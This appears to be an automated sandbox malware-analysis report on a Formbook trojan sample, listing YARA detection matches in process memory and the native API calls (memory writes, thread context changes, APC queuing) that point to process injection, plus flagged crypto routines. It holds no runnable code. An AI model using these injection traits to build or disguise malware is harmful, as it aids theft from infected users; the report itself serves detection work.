Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3301684101.0000000009270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: yaM8XR1HfL.exe PID: 1288, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: WWAHost.exe PID: 4424, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2B60 NtClose,LdrInitializeThunk, 4_2_014C2B60
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_014C2BF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2AD0 NtReadFile,LdrInitializeThunk, 4_2_014C2AD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2D10 NtMapViewOfSection,LdrInitializeThunk, 4_2_014C2D10
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2D30 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_014C2D30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2DD0 NtDelayExecution,LdrInitializeThunk, 4_2_014C2DD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_014C2DF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_014C2C70
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2CA0 NtQueryInformationToken,LdrInitializeThunk, 4_2_014C2CA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2F30 NtCreateSection,LdrInitializeThunk, 4_2_014C2F30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2FE0 NtCreateFile,LdrInitializeThunk, 4_2_014C2FE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2F90 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_014C2F90
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2FB0 NtResumeThread,LdrInitializeThunk, 4_2_014C2FB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2E80 NtReadVirtualMemory,LdrInitializeThunk, 4_2_014C2E80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_014C2EA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C4340 NtSetContextThread, 4_2_014C4340
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C4650 NtSuspendThread, 4_2_014C4650
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2BE0 NtQueryValueKey, 4_2_014C2BE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2B80 NtQueryInformationFile, 4_2_014C2B80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2BA0 NtEnumerateValueKey, 4_2_014C2BA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2AF0 NtWriteFile, 4_2_014C2AF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2AB0 NtWaitForSingleObject, 4_2_014C2AB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2D00 NtSetInformationFile, 4_2_014C2D00
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2DB0 NtEnumerateKey, 4_2_014C2DB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2C60 NtCreateKey, 4_2_014C2C60
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2C00 NtQueryInformationProcess, 4_2_014C2C00
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2CC0 NtQueryVirtualMemory, 4_2_014C2CC0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2CF0 NtOpenProcess, 4_2_014C2CF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2F60 NtCreateProcessEx, 4_2_014C2F60
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2FA0 NtQuerySection, 4_2_014C2FA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2E30 NtWriteVirtualMemory, 4_2_014C2E30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2EE0 NtQueueApcThread, 4_2_014C2EE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C3010 NtOpenDirectoryObject, 4_2_014C3010
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C3090 NtSetValueKey, 4_2_014C3090
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C35C0 NtCreateMutant, 4_2_014C35C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C39B0 NtGetContextThread, 4_2_014C39B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C3D70 NtOpenThread, 4_2_014C3D70
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C3D10 NtOpenProcessToken, 4_2_014C3D10
Source: C:\Windows\explorer.exe Code function: 7_2_09258232 NtCreateFile, 7_2_09258232
Source: C:\Windows\explorer.exe Code function: 7_2_09259E12 NtProtectVirtualMemory, 7_2_09259E12
Source: C:\Windows\explorer.exe Code function: 7_2_09259E0A NtProtectVirtualMemory, 7_2_09259E0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0014E0F0 GetCurrentProcess,NtQueryInformationProcess,QuirkIsEnabled,#90,InitOnceExecuteOnce,#157, 9_2_0014E0F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001A3774 GetCurrentProcess,NtSetInformationProcess, 9_2_001A3774
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001A37AC NtQuerySystemInformation, 9_2_001A37AC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00147E90 NtQueryInformationToken,HeapAlloc,memset,NtQueryInformationToken,RtlInitUnicodeString,RtlCompareUnicodeString,RtlNtStatusToDosErrorNoTeb,RtlNtStatusToDosErrorNoTeb,HeapFree, 9_2_00147E90
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2C60 NtCreateKey,LdrInitializeThunk, 9_2_040C2C60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_040C2C70
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2CA0 NtQueryInformationToken,LdrInitializeThunk, 9_2_040C2CA0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2D10 NtMapViewOfSection,LdrInitializeThunk, 9_2_040C2D10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2DD0 NtDelayExecution,LdrInitializeThunk, 9_2_040C2DD0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_040C2DF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_040C2EA0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2F30 NtCreateSection,LdrInitializeThunk, 9_2_040C2F30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2FE0 NtCreateFile,LdrInitializeThunk, 9_2_040C2FE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2AD0 NtReadFile,LdrInitializeThunk, 9_2_040C2AD0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2B60 NtClose,LdrInitializeThunk, 9_2_040C2B60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2BE0 NtQueryValueKey,LdrInitializeThunk, 9_2_040C2BE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_040C2BF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C35C0 NtCreateMutant,LdrInitializeThunk, 9_2_040C35C0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C4650 NtSuspendThread, 9_2_040C4650
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C4340 NtSetContextThread, 9_2_040C4340
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2C00 NtQueryInformationProcess, 9_2_040C2C00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2CC0 NtQueryVirtualMemory, 9_2_040C2CC0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2CF0 NtOpenProcess, 9_2_040C2CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2D00 NtSetInformationFile, 9_2_040C2D00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2D30 NtUnmapViewOfSection, 9_2_040C2D30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2DB0 NtEnumerateKey, 9_2_040C2DB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2E30 NtWriteVirtualMemory, 9_2_040C2E30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2E80 NtReadVirtualMemory, 9_2_040C2E80
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2EE0 NtQueueApcThread, 9_2_040C2EE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2F60 NtCreateProcessEx, 9_2_040C2F60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2F90 NtProtectVirtualMemory, 9_2_040C2F90
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2FA0 NtQuerySection, 9_2_040C2FA0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2FB0 NtResumeThread, 9_2_040C2FB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2AB0 NtWaitForSingleObject, 9_2_040C2AB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2AF0 NtWriteFile, 9_2_040C2AF0
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07685CA0 CreateProcessAsUserW, 0_2_07685CA0
Detected potential crypto function
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_00EA65E8 0_2_00EA65E8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_00EA74D8 0_2_00EA74D8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_00EABF44 0_2_00EABF44
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_00EA2968 0_2_00EA2968
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_00EABFB1 0_2_00EABFB1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07211C68 0_2_07211C68
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0721C4AD 0_2_0721C4AD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0721C4E0 0_2_0721C4E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0721D98D 0_2_0721D98D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0721D9C8 0_2_0721D9C8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07567750 0_2_07567750
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07569360 0_2_07569360
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756B368 0_2_0756B368
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07569A88 0_2_07569A88
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756B940 0_2_0756B940
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756A459 0_2_0756A459
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756E801 0_2_0756E801
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07569350 0_2_07569350
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756B336 0_2_0756B336
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07568721 0_2_07568721
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756F798 0_2_0756F798
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756F7A8 0_2_0756F7A8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756C210 0_2_0756C210
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756C201 0_2_0756C201
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756CE08 0_2_0756CE08
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756DAD0 0_2_0756DAD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756D6B0 0_2_0756D6B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756EAB0 0_2_0756EAB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756EAA2 0_2_0756EAA2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756D6A0 0_2_0756D6A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756F140 0_2_0756F140
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756F130 0_2_0756F130
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756CDF8 0_2_0756CDF8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756D478 0_2_0756D478
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756D468 0_2_0756D468
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07560006 0_2_07560006
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756D0F8 0_2_0756D0F8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07680FDA 0_2_07680FDA
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07689E30 0_2_07689E30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07684B59 0_2_07684B59
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07680220 0_2_07680220
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07686238 0_2_07686238
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07680040 0_2_07680040
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07683EA0 0_2_07683EA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07683E91 0_2_07683E91
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_076845C0 0_2_076845C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_076845D0 0_2_076845D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0768B470 0_2_0768B470
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07682CE0 0_2_07682CE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07682CD0 0_2_07682CD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07686B1F 0_2_07686B1F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07684B88 0_2_07684B88
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07686231 0_2_07686231
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07680210 0_2_07680210
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07680006 0_2_07680006
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07684099 0_2_07684099
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07B725C8 0_2_07B725C8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07B7A924 0_2_07B7A924
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07B725B8 0_2_07B725B8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07B7C4F0 0_2_07B7C4F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CD2708 0_2_07CD2708
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CDD648 0_2_07CDD648
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CDD639 0_2_07CDD639
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CDC0D0 0_2_07CDC0D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07211C51 0_2_07211C51
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01518158 4_2_01518158
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480100 4_2_01480100
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 4_2_0152A118
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015481CC 4_2_015481CC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015441A2 4_2_015441A2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015501AA 4_2_015501AA
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154A352 4_2_0154A352
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015503E6 4_2_015503E6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E3F0 4_2_0149E3F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015102C0 4_2_015102C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01550591 4_2_01550591
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01542446 4_2_01542446
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534420 4_2_01534420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153E4F6 4_2_0153E4F6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B4750 4_2_014B4750
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148C7C0 4_2_0148C7C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AC6E0 4_2_014AC6E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A6962 4_2_014A6962
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0155A9A6 4_2_0155A9A6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149A840 4_2_0149A840
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01492840 4_2_01492840
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE8F0 4_2_014BE8F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014768B8 4_2_014768B8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154AB40 4_2_0154AB40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01546BD7 4_2_01546BD7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148EA80 4_2_0148EA80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149AD00 4_2_0149AD00
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152CD1F 4_2_0152CD1F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148ADE0 4_2_0148ADE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A8DBF 4_2_014A8DBF
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490C00 4_2_01490C00
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480CF2 4_2_01480CF2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530CB5 4_2_01530CB5
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01504F40 4_2_01504F40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01532F30 4_2_01532F30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D2F28 4_2_014D2F28
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0F30 4_2_014B0F30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01482FC8 4_2_01482FC8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149CFE0 4_2_0149CFE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150EFA0 4_2_0150EFA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490E59 4_2_01490E59
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154EE26 4_2_0154EE26
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154EEDB 4_2_0154EEDB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154CE93 4_2_0154CE93
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2E90 4_2_014A2E90
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C516C 4_2_014C516C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147F172 4_2_0147F172
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0155B16B 4_2_0155B16B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149B1B0 4_2_0149B1B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014970C0 4_2_014970C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153F0CC 4_2_0153F0CC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154F0E0 4_2_0154F0E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015470E9 4_2_015470E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147D34C 4_2_0147D34C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154132D 4_2_0154132D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D739A 4_2_014D739A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AB2C0 4_2_014AB2C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015312ED 4_2_015312ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014952A0 4_2_014952A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01547571 4_2_01547571
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015595C3 4_2_015595C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152D5B0 4_2_0152D5B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01481460 4_2_01481460
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154F43F 4_2_0154F43F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154F7B0 4_2_0154F7B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D5630 4_2_014D5630
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015416CC 4_2_015416CC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01499950 4_2_01499950
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AB950 4_2_014AB950
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01525910 4_2_01525910
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FD800 4_2_014FD800
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014938E0 4_2_014938E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154FB76 4_2_0154FB76
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01505BF0 4_2_01505BF0
